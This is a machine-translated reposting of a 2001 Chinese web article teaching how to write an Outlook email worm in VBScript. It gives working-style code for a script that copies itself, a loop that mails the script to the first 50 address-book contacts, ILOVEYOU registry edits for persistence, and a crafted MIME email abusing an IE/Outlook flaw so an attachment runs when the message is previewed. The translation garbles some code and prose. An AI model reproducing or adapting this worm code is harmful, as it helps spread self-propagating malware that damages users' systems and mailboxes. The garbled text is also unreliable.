How to use Outlook vulnerability to write viral scripts

zhaozj2021-02-11 159

Http://www.tongyi.net Source: Network Click: 6189

How to use Outlook Vulnerability to Write a Virus Script Original: Coolweis (Coolweis) Source: Coolweis How to Write Worm Virus Coolweis Coolweis@NetGuard.com.cn April 6, 2001 01:22 AM Allegedly Outlook The spread of viral foot-and-mouth disease has been discovered that it seems that Microsoft can have a while. Outlook, Outlook is really notorious in transmitting viruses, like Iloveyou, Merissa, etc., viruses that have produced great destructive power are spread through Outlook. The root cause is Outlook humanization, high integration, complexity, etc. of scripts, which is due to these causes lead to the spread of viruses. Let's take a look at the mechanism of Outlook to spread viruses: first look at the major characteristics of the virus: self-replication, communication, and latent. We have a collection of self-replication. The virus to spread the self-replication by other emails or itself. The virus propagated by Outlook is basically written by vbscript. The principle of self-replication is basically using the program to copy a script content to one. Temporary files, and then send them as an accessory in the propagation link. How do we see how the script completes this feature. SET SO = CREATEOBJECT ("scripting.filesystemObject") SO.GETFILE (WScript.scriptfullName) .copy ("c: /dateiname.vbs") is such two lines to copy themselves to the root directory of DateinaMe.vbs file. The first line is to create a file system object, the second line is open this script file, wscript.scriptfullname indicates that this program itself is a complete path file name. The getFile function gets this file, the COPY function copies this file to the Dateiname.vbs of the C drive. This is a feature of most viruses written by VBScript. As you can see here, it is forbidden to control the spread of this virus. The following command can prohibit file system objects. Regsvr32 Scrrun.dll / u Let's take a look at the spread. The virus needs to spread, and the dissemination of email viruses is undoubtedly via email. For Outlook, the address book is quite good, but it also opens the door to the virus. Almost all email viruses propagated by Outlook are completed in the same script accessory with the email address stored in the address book.

Take a look at the following code: set = creteObject ("Outlook.Application") on Error Resume Next for x = 1 to 50 set mail = = teteItem (0) mail.to = Ol.getNameSpace ("MAPI"). AddressLists (1) .addressentries (x) mail.subject = "betreff der e-mail" mail.body = "text der e-mail" mail.ttachments.add ("c: /Dateina.vbs") mail.send Next OL .Quit This small segment function is to send an email to the top 50 users in the address book and use the script you as an attachment. The first line is to create an OUTLOOK object. Below is a loop, which is constantly transmitting content of the content as the email address in the address book in the loop. As for the latent, most of them are information to modify the registry to determine the various conditions and cancel some restrictions. The following example taken from Iloveyou virus part of the code: On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scripting Host / Settings / Timeout ") IF (rr> = 1) THEN wscr.regwrite" HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout ", 0," REG_DWORD "END IF is clearly the adjustment of the scripting language is set. The following piece of code is to modify the registry so that every system startup automatically execute the script: regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersion / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft /Windows/currentversion/runservices/win32dll", dirwin&"/win32dll.vbs "where MSkernel32.vbs and Win32dll.vbs are a copy of the viral script. Iloveyou viruse also made some other modifications. From the above, it can be seen that it is very simple to write an email virus propagated through Outlook. But as an attachment propagation, this propagation efficiency may be some discount. One of the following methods is based on the vulnerability of the latest IE.

Here is some of this vulnerability: from: "xxxxx" Subject: mail date: Thu, 2 Nov 2000 13:27:33 0100 Mime-Version: 1.0 Content-Type: Multipart / Related; type = "multipart / alternative" Boundary = "1" x-priority: 3 x-msmail-priority: Normal --1 Content-Type: Multipart / Alternative; Boundary = "2" --2 Content-Type: Text / HTML; Charset = "ISO- 8859-1 "Content-Transfer-Encoding: quoted-printable </ iframe > I will create the file c: /deleteme.txt <br> </ body> </ html> --2-- --1 Content-Type: Audio / X-WAV; Name = "Hello.vbs" Content- Transfer-Encoding: quoted-printable Content-ID: <THE-CID> set objFileSystem = 3D CreateObject ( "Scripting.FileSystemObject") set objOutputFile = 3D objFileSystem.CreateTextFile ( "C: /deleteme.txt", 1) objOutputFile.writeline ("You CAN Delete this file.") ObjoutputFile.close MsgBox "i Have Created The File: C: /Deleteme.txt" - An example of this program is indicating that Outlook will not prompt you when you double-click attachment? Safety information, it is performed directly. This is only the case where the entire top is sent as an attachment. In fact, this file is sent directly to the other party, and the other party will execute this script as long as the focus is moved to this topic. So this vulnerability will spread the email virus more effectively. The reason for the above vulnerability is probably used by HTML sending. Its background music file is not checked, causing scripts, applications, etc. to be executed. With different coding, you can embed the script, command line command, executable, etc. in the message. Note the above line: name = "Hello.vbs" This file name can be named any, if it is a script, the VBS extension is required. If it is the command line command, it should be the end of the BAT or CMD.</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-5462.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="5462" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.044</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'G_2BeUI_2FivZ8_2F2OjX4B7CvuAVHhSNwZh9cDksd38FlIcjbRNhNI6Q_2B6efRI3rtqQRY2nNyuKQbedw0cIn7tD0Csw_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>